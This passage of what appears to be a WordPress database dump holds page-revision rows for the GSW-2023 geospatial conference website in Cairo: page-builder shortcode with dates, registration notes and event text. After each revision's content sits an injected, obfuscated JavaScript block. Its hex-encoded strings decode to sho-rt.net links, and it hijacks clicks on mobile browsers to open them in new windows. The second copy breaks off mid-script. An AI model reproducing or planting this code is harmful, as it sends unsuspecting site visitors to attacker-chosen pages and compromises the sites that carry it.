dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:10:22','2022-11-09 18:10:22','',3066,'https://gsw2023.com/?p=3181',0,'revision','',0),
(3182,1,'2022-11-09 18:13:53','2022-11-09 18:13:53','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 